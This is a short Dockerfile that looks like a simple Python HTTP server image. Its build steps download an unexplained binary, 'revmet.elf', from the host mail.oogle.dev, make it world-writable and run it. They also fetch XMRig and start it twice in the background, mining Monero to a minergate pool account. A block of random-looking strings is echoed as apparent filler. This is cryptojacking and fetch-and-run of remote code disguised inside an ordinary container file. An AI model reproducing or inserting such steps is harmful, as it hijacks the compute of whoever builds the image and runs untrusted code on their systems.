FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 7L6LvjfBVbDMaCmKnB9KsNw7XZg331gi VHl6fUvo1hS2zomdZLt92JK2AlKW6tTL USca4k3IYC467IPKwHoN2HsK2DuRNXA6 e3fGjKAS1qCHUUi8TKCxeuW7cjVuTdI7 sajT6Z6praqSdFexxuxVTG3JLgxHC7db Y9hAnVzQUr0UieHsK2h0i4UEDpFktk1s tWOKg2uZmFp3FbVxJUCPKjVR2xSKpnkV nmeUicSRc247Ko7ge96RrApWpyaa9AIv WJbTmZFAmNow2UErRTKqRt8i2wyKv2MV DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]